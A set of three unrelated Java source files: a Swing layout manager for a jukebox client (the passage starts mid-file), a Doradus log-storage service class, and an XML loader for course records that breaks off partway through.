* ScrollPane, that contains all saved Gaplists on the Server.
*/
public static final String SAVED_GAPLIST_LABEL = "Saved_Gaplist_Label";
/**
* The String, that declares the Fail_Label, which will display responses from the Server.
*/
public static final String FAIL_LABEL = "Fail_Label";
/**
* The String, that declares the Add_Button.
*/
public static final String ADD_BUTTON = "Add_Button";
/**
* The String, that declares the Disconnect_Button.
*/
public static final String DISCONNECT_BUTTON = "Disconnect_Button";
/**
* The String, that declares the Debug_Button.
*/
public static final String DEBUG_BUTTON = "Debug_Button";
/**
* The String, that declares the Seek_Back_Button.
*/
public static final String SEEK_BACK_BUTTON = "Seek_Back_Button";
/**
* The String, that declares the Play_Pause_Button.
* @see windows.MainWindow#btnPlayPause
*/
public static final String PLAY_PAUSE_BUTTON = "Play_Pause_Button";
/**
* The String, that declares the Seek_Forward_Button.
*/
public static final String SEEK_FORWARD_BUTTON = "Seek_Forward_Button";
/**
* The String, that declares the Skip_Button.
*/
public static final String SKIP_BUTTON = "Skip_Button";
/**
* The String, that declares the Track_Up_Button.
*/
public static final String TRACK_UP_BUTTON = "Track_Up_Button";
/**
* The String, that declares the Track_Down_Button.
*/
public static final String TRACK_DOWN_BUTTON = "Track_Down_Button";
/**
* The String, that declares the Delete_Button.
*/
public static final String DELETE_BUTTON = "Delete_Button";
/**
* The String, that declares the Save_Button.
*/
public static final String SAVE_BUTTON = "Save_Button";
/**
* The String, that declares the Vote_Button.
*/
public static final String VOTE_BUTTON = "Vote_Button";
/**
* The String, that declares the Remove_Vote_Button.
*/
public static final String REMOVE_VOTE_BUTTON = "Remove_Vote_Button";
/**
* The String, that declares the Load_Button.
*/
public static final String LOAD_BUTTON = "Load_Button";
/**
* The String, that declares the Show_Button.
*/
public static final String SHOW_BUTTON = "Show_Button";
/**
* The String, that declares the Remove_Button.
*/
public static final String REMOVE_BUTTON = "Remove_Button";
/**
* The String, that declares the Create_Button.
*/
public static final String CREATE_BUTTON = "Create_Button";
/**
* The String, that declares the Link_Textfield, which will be used to add Videos to the
* Jukebox.
* @see windows.MainWindow#txtLink
*/
public static final String LINK_TEXT = "Link_Text";
/**
* The String, that declares the Gaplist_Textfield, which will be used to name new
* Gaplists.
*/
public static final String GAPLIST_TEXT = "Gaplist_Text";
/**
* The String, that declares the Gaplist_RadioButton.
*/
public static final String GAPLIST_RADIO = "Gaplist_Radio";
/**
* The String, that declares the Wishlist_RadioButton.
*/
public static final String WISHLIST_RADIO = "Wishlist_Radio";
/**
* The String, that declares the Front_CheckBox.
*/
public static final String FRONT_CHECK = "Front_Check";
/**
* The String, that declares the ScrollPane for the current Gaplist.
*/
public static final String GAPLIST_SCROLL = "Gaplist_Scroll";
/**
* The String, that declares the ScrollPane for the current Wishlist.
*/
public static final String WISHLIST_SCROLL = "Wishlist_Scroll";
/**
* The String, that declares the ScrollPane for all saved Gaplists on the Server.
*/
public static final String SAVED_GAPLIST_SCROLL = "Saved_Gaplist_Scroll";
/**
* The String, that declares the ScrollPane for the Content of the current shown Gaplist.
*/
public static final String CONTENT_SCROLL = "Content_Scroll";
/**
* A {@link HashMap} of all Components, that were added to the Layout.
* @see Component
*/
private HashMap<String, Component> components;
/**
* The Constructor for the Layout.
* @since 1.0
*/
public ClientLayout() {
components = new HashMap<String, Component>();
}
@Override
public void addLayoutComponent(String componentPosition, Component Component) {
if (checkLayoutComponent(componentPosition))
components.put(componentPosition, Component);
}
@Override
public void layoutContainer(Container parent) {
final int height = parent.getHeight();
final int width = parent.getWidth();
final int lblHeight = (int)(height*0.02);
final int spacer = (int)(width*0.016);
final int manButtonHeight = (int)(height*0.064);
final int manButtonWidth = (int)(width*0.2);
final int buttonHeight = (int)(height*0.032);
final int secondButtonY = (int)(height*0.624);
final int thirdButtonY = (int)(height*0.91);
/***********************************Labels***************************************/
if (components.get(GAPLIST_LABEL) != null)
components.get(GAPLIST_LABEL).setBounds(10, 10, Math.min((int)(width*0.205),123), lblHeight);
if(components.get(WISHLIST_LABEL) != null)
components.get(WISHLIST_LABEL).setBounds(10, 10+ (int)(height*0.037), Math.min((int)(width*0.205), 123), lblHeight);
if (components.get(COUNT_GAPLIST_LABEL) != null)
components.get(COUNT_GAPLIST_LABEL).setBounds(10+Math.min((int)(width*0.205),123)+spacer, 10, (int)(width*0.1133), lblHeight);
if (components.get(COUNT_WISHLIST_LABEL) != null)
components.get(COUNT_WISHLIST_LABEL).setBounds(10+Math.min((int)(width*0.205),123)+spacer,10+(int)(height*0.037),(int)(width*0.1133),lblHeight);
if (components.get(NOW_PLAYING_LABEL) != null)
components.get(NOW_PLAYING_LABEL).setBounds(10, (int)(height*0.205), Math.min(68,(int)(width*0.1133)),lblHeight);
if (components.get(NEXT_TRACK_LABEL) != null)
components.get(NEXT_TRACK_LABEL).setBounds(10, (int)(height*0.241), Math.min(68,(int)(width*0.1133)),lblHeight);
if (components.get(NAME_NOW_PLAYING_LABEL) != null)
components.get(NAME_NOW_PLAYING_LABEL).setBounds(Math.min(68,(int)(width*0.1133)) + 10 + spacer, (int)(height*0.205), (int)(width*0.6406), lblHeight);
if (components.get(NAME_NEXT_TRACK_LABEL) != null)
components.get(NAME_NEXT_TRACK_LABEL).setBounds(Math.min(68,(int)(width*0.1133)) + 10 + spacer, (int)(height*0.241), (int)(width*0.6406), lblHeight);
if (components.get(GAPLIST_NAME_LABEL) != null)
components.get(GAPLIST_NAME_LABEL).setBounds(10, (int)(height*0.428), (int)(width*0.416), lblHeight);
if (components.get(WISHLIST_SHOW_LABEL) != null)
components.get(WISHLIST_SHOW_LABEL).setBounds((int)(width*0.533), (int)(height*0.428), (int)(width*0.416), lblHeight);
if (components.get(SAVED_GAPLIST_LABEL) != null)
components.get(SAVED_GAPLIST_LABEL).setBounds(10, (int)(height*0.714), (int)(width*0.416), lblHeight);
if (components.get(FAIL_LABEL) != null)
components.get(FAIL_LABEL).setBounds((int)(width*0.29), (int)(height*0.4), (int)(width*19.0/60.0), lblHeight);
/**************************Buttons**************************/
if (components.get(ADD_BUTTON) != null)
components.get(ADD_BUTTON).setBounds(10, (int)(height*0.13), (int)(width*0.1), (int)(height*0.04));
if (components.get(SEEK_BACK_BUTTON) != null)
components.get(SEEK_BACK_BUTTON).setBounds(10, (int)(height*0.277), manButtonWidth, manButtonHeight);
if (components.get(PLAY_PAUSE_BUTTON) != null)
components.get(PLAY_PAUSE_BUTTON).setBounds(manButtonWidth+10+spacer, (int)(height*0.277), manButtonWidth, manButtonHeight);
if (components.get(SEEK_FORWARD_BUTTON) != null)
components.get(SEEK_FORWARD_BUTTON).setBounds((int)(width*0.533), (int)(height*0.277), manButtonWidth, manButtonHeight);
if (components.get(SKIP_BUTTON) != null)
components.get(SKIP_BUTTON).setBounds((int)(width*0.533)+manButtonWidth+spacer, (int)(height*0.277), manButtonWidth, manButtonHeight);
if (components.get(DISCONNECT_BUTTON) != null)
components.get(DISCONNECT_BUTTON).setBounds((int)(width*0.533)+manButtonWidth+spacer, 10, manButtonWidth, buttonHeight);
if (components.get(DEBUG_BUTTON) != null)
components.get(DEBUG_BUTTON).setBounds((int)(width*0.533)+manButtonWidth+spacer, 10+(int)(height*0.032+height*0.01), manButtonWidth, buttonHeight);
if (components.get(DELETE_BUTTON) != null)
components.get(DELETE_BUTTON).setBounds(10, secondButtonY, manButtonWidth, buttonHeight);
if (components.get(SAVE_BUTTON) != null)
components.get(SAVE_BUTTON).setBounds(10+manButtonWidth+spacer, secondButtonY, manButtonWidth, buttonHeight);
if (components.get(TRACK_UP_BUTTON) != null)
components.get(TRACK_UP_BUTTON).setBounds(10+2*manButtonWidth+spacer+2, (int)(height*0.487), Math.min(40, (int)(width*0.067)), Math.min(25,(int)(height*0.036)));
if (components.get(TRACK_DOWN_BUTTON) != null)
components.get(TRACK_DOWN_BUTTON).setBounds(10+2*manButtonWidth+spacer+2, (int)(height*0.56), Math.min(40, (int)(width*0.067)), Math.min(25,(int)(height*0.036)));
if (components.get(LOAD_BUTTON) != null)
components.get(LOAD_BUTTON).setBounds(10, thirdButtonY, (int)((2*manButtonWidth+spacer)*0.3), buttonHeight);
if (components.get(SHOW_BUTTON) != null)
components.get(SHOW_BUTTON).setBounds(10+(int)((2*manButtonWidth+spacer)*0.3)+spacer, thirdButtonY, (int)((2*manButtonWidth+spacer)*0.3), buttonHeight);
if (components.get(REMOVE_BUTTON) != null)
components.get(REMOVE_BUTTON).setBounds(2*(int)((2*manButtonWidth+spacer)*0.3)+10+2*spacer, thirdButtonY, (int)((2*manButtonWidth+spacer+10)-(2*(int)((2*manButtonWidth+spacer)*0.3)+10+2*spacer)), buttonHeight);
if (components.get(CREATE_BUTTON) != null)
components.get(CREATE_BUTTON).setBounds((int)(width*0.533), thirdButtonY, (int)(width*2/15), buttonHeight);
if (components.get(VOTE_BUTTON) != null)
components.get(VOTE_BUTTON).setBounds((int)(width*0.533), secondButtonY, manButtonWidth, buttonHeight);
if (components.get(REMOVE_VOTE_BUTTON) != null)
components.get(REMOVE_VOTE_BUTTON).setBounds((int)(width*0.533)+manButtonWidth+spacer, secondButtonY, manButtonWidth, buttonHeight);
/************************************Panes**********************************/
if (components.get(GAPLIST_SCROLL) != null)
components.get(GAPLIST_SCROLL).setBounds(10, (int)(height*0.468), 2*manButtonWidth+spacer, height/7);
if (components.get(WISHLIST_SCROLL) != null)
components.get(WISHLIST_SCROLL).setBounds((int)(width*0.533), (int)(height*0.468), 2*manButtonWidth+spacer, height/7);
if (components.get(SAVED_GAPLIST_SCROLL) != null)
components.get(SAVED_GAPLIST_SCROLL).setBounds(10, (int)(height*0.754), 2*manButtonWidth+spacer, height/7);
if (components.get(CONTENT_SCROLL) != null)
components.get(CONTENT_SCROLL).setBounds((int)(width*0.533), (int)(height*0.753), 2*manButtonWidth+spacer, height/7);
/******************************TextFields********************************/
if (components.get(LINK_TEXT) != null)
components.get(LINK_TEXT).setBounds(10, (int)(height*3/35), (int)(width*0.533)-10, (int)(height/35));
if (components.get(GAPLIST_TEXT) != null)
components.get(GAPLIST_TEXT).setBounds((int)(width*0.533)+(int)(width*2/15)+spacer, thirdButtonY, (2*manButtonWidth)-((int)(width*2/15)), buttonHeight);
/*****************************RadioButtons********************************/
if (components.get(WISHLIST_RADIO) != null)
components.get(WISHLIST_RADIO).setBounds((int)(width*13/100), (int)(height*9/70), (int)(width*0.125), buttonHeight);
if (components.get(GAPLIST_RADIO) != null)
components.get(GAPLIST_RADIO).setBounds((int)(width*13/100)+(int)(width*0.125)+2, (int)(height*9/70), (int)(width*0.125), buttonHeight);
/***************************CheckBox***********************************/
if (components.get(FRONT_CHECK) != null)
components.get(FRONT_CHECK).setBounds((int)(width*13/100)+(int)(width*0.25)+4, (int)(height*9/70), (int)(width*97/600), buttonHeight);
}
@Override
public Dimension minimumLayoutSize(Container arg0) {
return new Dimension(300,300);
}
@Override
public Dimension preferredLayoutSize(Container arg0) {
return new Dimension(600,700);
}
@Override
public void removeLayoutComponent(Component comp) {
if (components.containsValue(comp))
remove(comp);
}
/**
* Checks, if the given String is the key for a Component in the components-HashMap
* @param regex The String, that will be checked, if it's a key in the HashMap.
* @return true, if the String is a key, false else.
* @since 1.0
* @see ClientLayout#components
*/
private boolean checkLayoutComponent(String regex) {
if ( regex.equals(GAPLIST_LABEL) || regex.equals(WISHLIST_LABEL) ||
regex.equals(NOW_PLAYING_LABEL) || regex.equals(NEXT_TRACK_LABEL) ||
regex.equals(COUNT_GAPLIST_LABEL) || regex.equals(COUNT_WISHLIST_LABEL) ||
regex.equals(NAME_NOW_PLAYING_LABEL) || regex.equals(NAME_NEXT_TRACK_LABEL) ||
regex.equals(GAPLIST_NAME_LABEL) || regex.equals(WISHLIST_SHOW_LABEL) ||
regex.equals(SAVED_GAPLIST_LABEL) || regex.equals(FAIL_LABEL) ||
regex.equals(ADD_BUTTON) || regex.equals(DISCONNECT_BUTTON) ||
regex.equals(DEBUG_BUTTON) || regex.equals(SEEK_BACK_BUTTON) ||
regex.equals(PLAY_PAUSE_BUTTON) || regex.equals(SEEK_FORWARD_BUTTON) ||
regex.equals(SKIP_BUTTON) || regex.equals(TRACK_UP_BUTTON) ||
regex.equals(TRACK_DOWN_BUTTON) || regex.equals(DELETE_BUTTON) ||
regex.equals(SAVE_BUTTON) || regex.equals(VOTE_BUTTON) ||
regex.equals(REMOVE_VOTE_BUTTON) || regex.equals(LOAD_BUTTON) ||
regex.equals(SHOW_BUTTON) || regex.equals(REMOVE_BUTTON) ||
regex.equals(CREATE_BUTTON) || regex.equals(LINK_TEXT) ||
regex.equals(GAPLIST_TEXT) || regex.equals(GAPLIST_RADIO) ||
regex.equals(WISHLIST_RADIO) || regex.equals(FRONT_CHECK) ||
regex.equals(GAPLIST_SCROLL) || regex.equals(WISHLIST_SCROLL) ||
regex.equals(SAVED_GAPLIST_SCROLL) || regex.equals(CONTENT_SCROLL))
return true;
else
return false;
}
/**
* Removes a Component from the Layout and replaces it with {@code null}.
* @param comp The Component to be removed.
* @since 1.0
* @see Component
*/
private void remove(Component comp) {
if (components.get(GAPLIST_LABEL) != null)
if (components.get(GAPLIST_LABEL).equals(comp)) {
components.put(GAPLIST_LABEL, null);
return;
}
if (components.get(WISHLIST_LABEL) != null)
if (components.get(WISHLIST_LABEL).equals(comp)) {
components.put(WISHLIST_LABEL, null);
return;
}
if (components.get(NOW_PLAYING_LABEL) != null)
if (components.get(NOW_PLAYING_LABEL).equals(comp)) {
components.put(NOW_PLAYING_LABEL, null);
return;
}
if (components.get(NEXT_TRACK_LABEL) != null)
if (components.get(NEXT_TRACK_LABEL).equals(comp)) {
components.put(NEXT_TRACK_LABEL, null);
return;
}
if (components.get(COUNT_GAPLIST_LABEL) != null)
if (components.get(COUNT_GAPLIST_LABEL).equals(comp)) {
components.put(COUNT_GAPLIST_LABEL, null);
return;
}
if (components.get(COUNT_WISHLIST_LABEL) != null)
if (components.get(COUNT_WISHLIST_LABEL).equals(comp)) {
components.put(COUNT_WISHLIST_LABEL, null);
return;
}
if (components.get(NAME_NOW_PLAYING_LABEL) != null)
if (components.get(NAME_NOW_PLAYING_LABEL).equals(comp)) {
components.put(NAME_NOW_PLAYING_LABEL, null);
return;
}
if (components.get(NAME_NEXT_TRACK_LABEL) != null)
if (components.get(NAME_NEXT_TRACK_LABEL).equals(comp)) {
components.put(WISHLIST_LABEL, null);
return;
}
if (components.get(GAPLIST_NAME_LABEL) != null)
if (components.get(GAPLIST_NAME_LABEL).equals(comp)) {
components.put(GAPLIST_NAME_LABEL, null);
return;
}
if (components.get(WISHLIST_SHOW_LABEL) != null)
if (components.get(WISHLIST_SHOW_LABEL).equals(comp)) {
components.put(WISHLIST_SHOW_LABEL, null);
return;
}
if (components.get(SAVED_GAPLIST_LABEL) != null)
if (components.get(SAVED_GAPLIST_LABEL).equals(comp)) {
components.put(SAVED_GAPLIST_LABEL, null);
return;
}
if (components.get(FAIL_LABEL) != null)
if (components.get(FAIL_LABEL).equals(comp)) {
components.put(FAIL_LABEL, null);
return;
}
if (components.get(ADD_BUTTON) != null)
if (components.get(ADD_BUTTON).equals(comp)) {
components.put(ADD_BUTTON, null);
return;
}
if (components.get(DISCONNECT_BUTTON) != null)
if (components.get(DISCONNECT_BUTTON).equals(comp)) {
components.put(DISCONNECT_BUTTON, null);
return;
}
if (components.get(DEBUG_BUTTON) != null)
if (components.get(DEBUG_BUTTON).equals(comp)) {
components.put(DEBUG_BUTTON, null);
return;
}
if (components.get(SEEK_BACK_BUTTON) != null)
if (components.get(SEEK_BACK_BUTTON).equals(comp)) {
components.put(SEEK_BACK_BUTTON, null);
return;
}
if (components.get(PLAY_PAUSE_BUTTON) != null)
if (components.get(PLAY_PAUSE_BUTTON).equals(comp)) {
components.put(PLAY_PAUSE_BUTTON, null);
return;
}
if (components.get(SEEK_FORWARD_BUTTON) != null)
if (components.get(SEEK_FORWARD_BUTTON).equals(comp)) {
components.put(SEEK_FORWARD_BUTTON, null);
return;
}
if (components.get(SKIP_BUTTON) != null)
if (components.get(SKIP_BUTTON).equals(comp)) {
components.put(SKIP_BUTTON, null);
return;
}
if (components.get(TRACK_UP_BUTTON) != null)
if (components.get(TRACK_UP_BUTTON).equals(comp)) {
components.put(TRACK_UP_BUTTON, null);
return;
}
if (components.get(TRACK_DOWN_BUTTON) != null)
if (components.get(TRACK_DOWN_BUTTON).equals(comp)) {
components.put(TRACK_DOWN_BUTTON, null);
return;
}
if (components.get(DELETE_BUTTON) != null)
if (components.get(DELETE_BUTTON).equals(comp)) {
components.put(DELETE_BUTTON, null);
return;
}
if (components.get(SAVE_BUTTON) != null)
if (components.get(SAVE_BUTTON).equals(comp)) {
components.put(SAVE_BUTTON, null);
return;
}
if (components.get(VOTE_BUTTON) != null)
if (components.get(VOTE_BUTTON).equals(comp)) {
components.put(VOTE_BUTTON, null);
return;
}
if (components.get(REMOVE_VOTE_BUTTON) != null)
if (components.get(REMOVE_VOTE_BUTTON).equals(comp)) {
components.put(REMOVE_VOTE_BUTTON, null);
return;
}
if (components.get(LOAD_BUTTON) != null)
if (components.get(LOAD_BUTTON).equals(comp)) {
components.put(LOAD_BUTTON, null);
return;
}
if (components.get(SHOW_BUTTON) != null)
if (components.get(SHOW_BUTTON).equals(comp)) {
components.put(SHOW_BUTTON, null);
return;
}
if (components.get(REMOVE_BUTTON) != null)
if (components.get(REMOVE_BUTTON).equals(comp)) {
components.put(REMOVE_BUTTON, null);
return;
}
if (components.get(CREATE_BUTTON) != null)
if (components.get(CREATE_BUTTON).equals(comp)) {
components.put(CREATE_BUTTON, null);
return;
}
if (components.get(LINK_TEXT) != null)
if (components.get(LINK_TEXT).equals(comp)) {
components.put(LINK_TEXT, null);
return;
}
if (components.get(GAPLIST_TEXT) != null)
if (components.get(GAPLIST_TEXT).equals(comp)) {
components.put(GAPLIST_TEXT, null);
return;
}
if (components.get(GAPLIST_RADIO) != null)
if (components.get(GAPLIST_RADIO).equals(comp)) {
components.put(GAPLIST_RADIO, null);
return;
}
if (components.get(WISHLIST_RADIO) != null)
if (components.get(WISHLIST_RADIO).equals(comp)) {
components.put(WISHLIST_RADIO, null);
return;
}
if (components.get(FRONT_CHECK) != null)
if (components.get(FRONT_CHECK).equals(comp)) {
components.put(FRONT_CHECK, null);
return;
}
if (components.get(GAPLIST_SCROLL) != null)
if (components.get(GAPLIST_SCROLL).equals(comp)) {
components.put(GAPLIST_SCROLL, null);
return;
}
if (components.get(WISHLIST_SCROLL) != null)
if (components.get(WISHLIST_SCROLL).equals(comp)) {
components.put(WISHLIST_SCROLL, null);
return;
}
if (components.get(SAVED_GAPLIST_SCROLL) != null)
if (components.get(SAVED_GAPLIST_SCROLL).equals(comp)) {
components.put(SAVED_GAPLIST_SCROLL, null);
return;
}
if (components.get(CONTENT_SCROLL) != null)
if (components.get(CONTENT_SCROLL).equals(comp)) {
components.put(CONTENT_SCROLL, null);
return;
}
}
}
|
|
package com.dell.doradus.logservice;
import java.util.ArrayList;
import java.util.List;
import com.dell.doradus.common.Utils;
import com.dell.doradus.logservice.search.Searcher;
import com.dell.doradus.logservice.store.BatchWriter;
import com.dell.doradus.logservice.store.ChunkMerger;
import com.dell.doradus.olap.OlapBatch;
import com.dell.doradus.olap.aggregate.AggregationResult;
import com.dell.doradus.olap.io.BSTR;
import com.dell.doradus.search.SearchResultList;
import com.dell.doradus.service.db.DBService;
import com.dell.doradus.service.db.DBTransaction;
import com.dell.doradus.service.db.DColumn;
import com.dell.doradus.service.db.DRow;
import com.dell.doradus.service.db.Tenant;
public class LogService {
public LogService() { }
public void createTable(Tenant tenant, String application, String table) {
String store = application + "_" + table;
DBService.instance(tenant).createStoreIfAbsent(store, true);
}
public void deleteTable(Tenant tenant, String application, String table) {
String store = application + "_" + table;
DBService.instance(tenant).deleteStoreIfPresent(store);
}
public String getPartition(long timestamp) {
String date = new DateFormatter().format(timestamp);
String partition = date.substring(0, 10).replace("-", "");
return partition;
}
public long getTimestamp(String partition) {
String date = partition.substring(0, 4) + "-" + partition.substring(4, 6) + "-" + partition.substring(6, 8);
long timestamp = Utils.parseDate(date).getTimeInMillis();
return timestamp;
}
public void addBatch(Tenant tenant, String application, String table, OlapBatch batch) {
String store = application + "_" + table;
int size = batch.size();
if(size == 0) return;
int start = 0;
BatchWriter writer = new BatchWriter();
DBTransaction transaction = DBService.instance(tenant).startTransaction();
while(start < size) {
String dateStr = batch.get(start).getId();
Utils.parseDate(dateStr);
String day = dateStr.substring(0, 10);
int end = start + 1;
while(end < size) {
String nextDay = batch.get(end).getId().substring(0, 10);
if(!nextDay.equals(day)) break;
end++;
}
byte[] data = writer.writeChunk(batch, start, end - start);
String partition = day.replace("-", "");
String uuid = Utils.getUniqueId();
ChunkInfo chunkInfo = new ChunkInfo();
chunkInfo.set(partition, uuid, writer.getWriter());
transaction.addColumn(store, "partitions", partition, "");
transaction.addColumn(store, "partitions_" + partition, uuid, chunkInfo.getByteData());
for(BSTR field: writer.getFields()) {
transaction.addColumn(store, "fields", field.toString(), "");
}
transaction.addColumn(store, partition, uuid, data);
start = end;
}
DBService.instance(tenant).commit(transaction);
}
public void deleteOldSegments(Tenant tenant, String application, String table, long removeBeforeTimestamp) {
String store = application + "_" + table;
String partitionToCompare = getPartition(removeBeforeTimestamp);
List<String> partitions = getPartitions(tenant, application, table);
DBTransaction transaction = null;
for(String partition: partitions) {
if(partition.compareTo(partitionToCompare) >= 0) continue;
if(transaction == null) transaction = DBService.instance(tenant).startTransaction();
transaction.deleteColumn(store, "partitions", partition);
transaction.deleteRow(store, partition);
transaction.deleteRow(store, "partitions_" + partition);
}
if(transaction != null) DBService.instance(tenant).commit(transaction);
}
public void mergePartition(Tenant tenant, String application, String table, String partition) {
final int MERGE_SEGMENTS = 8192;
final int MIN_MERGE_DOCS = 8192;
final int MAX_MERGE_DOCS = 65536;
String store = application + "_" + table;
List<ChunkInfo> infos = new ArrayList<ChunkInfo>(MERGE_SEGMENTS);
int totalSize = 0;
ChunkInfo info = new ChunkInfo();
ChunkMerger merger = null;
for(DColumn c: DBService.instance(tenant).getAllColumns(store, "partitions_" + partition)) {
info.set(partition, c.getName(), c.getRawValue());
int eventsCount = info.getEventsCount();
if(eventsCount > MIN_MERGE_DOCS) continue;
if(totalSize + eventsCount > MAX_MERGE_DOCS || infos.size() == MAX_MERGE_DOCS) {
if(merger == null) merger = new ChunkMerger(this, tenant, application, table);
mergeChunks(infos, merger);
infos.clear();
totalSize = 0;
}
infos.add(new ChunkInfo(info));
totalSize += eventsCount;
}
if(totalSize >= MIN_MERGE_DOCS) {
if(merger == null) merger = new ChunkMerger(this, tenant, application, table);
mergeChunks(infos, merger);
infos.clear();
totalSize = 0;
}
}
private void mergeChunks(List<ChunkInfo> infos, ChunkMerger merger) {
byte[] data = merger.mergeChunks(infos);
String store = merger.getApplication() + "_" + merger.getTable();
String partition = infos.get(0).getPartition();
String uuid = Utils.getUniqueId();
ChunkInfo chunkInfo = new ChunkInfo();
chunkInfo.set(partition, uuid, merger.getWriter());
DBTransaction transaction = DBService.instance(merger.getTenant()).startTransaction();
transaction.addColumn(store, "partitions_" + partition, uuid, chunkInfo.getByteData());
transaction.addColumn(store, partition, uuid, data);
for(ChunkInfo info: infos) {
transaction.deleteColumn(store, "partitions_" + partition, info.getChunkId());
transaction.deleteColumn(store, partition, info.getChunkId());
}
DBService.instance(merger.getTenant()).commit(transaction);
}
public List<String> getPartitions(Tenant tenant, String application, String table) {
String store = application + "_" + table;
List<String> partitions = new ArrayList<>();
for(DColumn c: DBService.instance(tenant).getAllColumns(store, "partitions")) {
partitions.add(c.getName());
}
return partitions;
}
public List<String> getPartitions(Tenant tenant, String application, String table, long minTimestamp, long maxTimestamp) {
long oneDayMillis = 1000 * 3600 * 24;
String minPartition = minTimestamp == 0 ? "" : getPartition(minTimestamp);
String maxPartition = maxTimestamp == Long.MAX_VALUE ? "z" : getPartition(maxTimestamp + oneDayMillis - 1);
return getPartitions(tenant, application, table, minPartition, maxPartition);
}
public List<String> getPartitions(Tenant tenant, String application, String table, String fromPartition, String toPartition) {
String store = application + "_" + table;
List<String> partitions = new ArrayList<>();
for(DColumn c: DBService.instance(tenant).getColumnSlice(store, "partitions", fromPartition, toPartition + '\0')) {
partitions.add(c.getName());
}
return partitions;
}
public void readChunk(Tenant tenant, String application, String table, ChunkInfo chunkInfo, ChunkReader chunkReader) {
byte[] data = readChunkData(tenant, application, table, chunkInfo);
if(data == null) throw new RuntimeException("Data was deleted");
chunkReader.read(data);
}
public byte[] readChunkData(Tenant tenant, String application, String table, ChunkInfo chunkInfo) {
String store = application + "_" + table;
DColumn column = DBService.instance(tenant).getColumn(store, chunkInfo.getPartition(), chunkInfo.getChunkId());
if(column == null) return null;
return column.getRawValue();
}
public List<byte[]> readChunks(Tenant tenant, String application, String table, List<ChunkInfo> infos) {
String store = application + "_" + table;
List<String> chunkIds = new ArrayList<>(infos.size());
for(ChunkInfo info: infos) chunkIds.add(info.getChunkId());
List<byte[]> data = new ArrayList<>(infos.size());
DRow row = DBService.instance(tenant).getRow(store, infos.get(0).getPartition());
for(DColumn c: row.getColumns(chunkIds, 100)) {
data.add(c.getRawValue());
}
if(data.size() != infos.size()) throw new RuntimeException("Error reading data");
return data;
}
public SearchResultList search(Tenant tenant, String application, String table, LogQuery logQuery) {
return Searcher.search(this, tenant, application, table, logQuery);
}
public AggregationResult aggregate(Tenant tenant, String application, String table, LogAggregate logAggregate) {
return Searcher.aggregate(this, tenant, application, table, logAggregate);
}
public ChunkIterable getChunks(Tenant tenant, String application, String table, String partition) {
String store = application + "_" + table;
return new ChunkIterable(tenant, store, partition);
}
}
|
|
/**
* Loads and saves from and to XML files.
*
* @author Brett M. Story
* @date 13 October, 2013
*/
package io;
import java.io.BufferedWriter;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.OutputStreamWriter;
import java.io.Writer;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import objects.*;
import org.w3c.dom.Document;
import org.w3c.dom.Node;
import org.w3c.dom.NodeList;
import org.xml.sax.Attributes;
import org.xml.sax.SAXException;
import org.xml.sax.SAXParseException;
import org.xml.sax.helpers.DefaultHandler;
public class parseXML {
private static MyCourse course;
private static MyCourse loadCourseInfo(File file) {
course = new MyCourse(null);
try {
// Initial setup of document parser
DocumentBuilderFactory docBuilderFactory = DocumentBuilderFactory.newInstance();
DocumentBuilder docBuilder = docBuilderFactory.newDocumentBuilder();
Document doc = docBuilder.parse(file);
// normalize text representation
doc.getDocumentElement().normalize();
/* ------------------------------
* Section for courseName
* -------------------------------*/
NodeList courseNameList = doc.getElementsByTagName("courseName");
Node courseNameNode = courseNameList.item(0);
//Note: you must do .getFirstChild().getNodeValue() to return what's inside the tags
course.setName(courseNameNode.getFirstChild().getNodeValue());
/* ------------------------------
* Section for courseID/#/Section
* -------------------------------*/
NodeList courseIDList = doc.getElementsByTagName("courseID");
Node courseIDNode = courseIDList.item(0);
course.setCourseID(courseIDNode.getFirstChild().getNodeValue());
NodeList courseNumberList = doc.getElementsByTagName("courseNumber");
Node courseNumberNode = courseNumberList.item(0);
course.setCourseNumber(Integer.parseInt(courseNumberNode.getFirstChild().getNodeValue()));
NodeList sectionList = doc.getElementsByTagName("section");
Node sectionNode = sectionList.item(0);
course.setSection(sectionNode.getFirstChild().getNodeValue());
/* ------------------------------
* Section for building/roomNumber
* -------------------------------*/
NodeList buildingList = doc.getElementsByTagName("building");
Node buildingNode = buildingList.item(0);
Node buildingTextNode = buildingNode.getFirstChild();
if (buildingTextNode != null) {
course.setBuilding(buildingTextNode.getNodeValue());
}
NodeList roomIDList = doc.getElementsByTagName("roomID");
Node roomIDNode = roomIDList.item(0);
Node roomIDTextNode = roomIDNode.getFirstChild();
if (roomIDTextNode != null) {
course.setRoomID(roomIDTextNode.getNodeValue());
}
/* ------------------------------
* Section for meetingTime
* -------------------------------*/
NodeList meetingTimeList = doc.getElementsByTagName("meetingTime");
Node meetingTimeNode = meetingTimeList.item(0);
Node meetingTimeTextNode = meetingTimeNode.getFirstChild();
if (meetingTimeTextNode != null) {
course.setMeetingTime(meetingTimeTextNode.getNodeValue());
}
/* ------------------------------
* Section for semester
* -------------------------------*/
NodeList semesterList = doc.getElementsByTagName("semester");
Node semesterNode = semesterList.item(0);
course.setSemester(semesterNode.getFirstChild().getNodeValue());
Node semesterTextNode = semesterNode.getFirstChild();
if (semesterTextNode != null) {
course.setSemester(semesterTextNode.getNodeValue());
}
/* ------------------------------
* Section for index
* -------------------------------*/
NodeList indexList = doc.getElementsByTagName("index");
Node assignmentNode = indexList.item(0);
Node categoryNode = indexList.item(1);
if (assignmentNode.getFirstChild().getNodeValue().equals("null") || categoryNode.getFirstChild().getNodeValue().equals("null")) {
course.setLastAssignmentIndex(null);
course.setLastCategoryIndex(null);
}
else {
course.setLastAssignmentIndex(Integer.parseInt(assignmentNode.getFirstChild().getNodeValue()));
course.setLastCategoryIndex(Integer.parseInt(categoryNode.getFirstChild().getNodeValue()));
}
//Beyond this point are all catches
}catch (SAXParseException err)
{
System.out.println("** Parsing error" + ", line " +
err.getLineNumber() + ", uri " + err.getSystemId());
System.out.println(" " + err.getMessage());
}catch (SAXException e) {
// TODO Auto-generated catch block
Exception x = e.getException();
((x == null) ? e: x).printStackTrace();
}catch (Throwable t) {
// TODO Auto-generated catch block
t.printStackTrace();
}
return course;
}
private static void loadStudentInfo(File file) {
try {
SAXParserFactory factory = SAXParserFactory.newInstance();
SAXParser saxParser = factory.newSAXParser();
DefaultHandler handler = new DefaultHandler() {
String firstName = null;
String lastName = null;
String psuedoName = null;
boolean isFirstName = false;
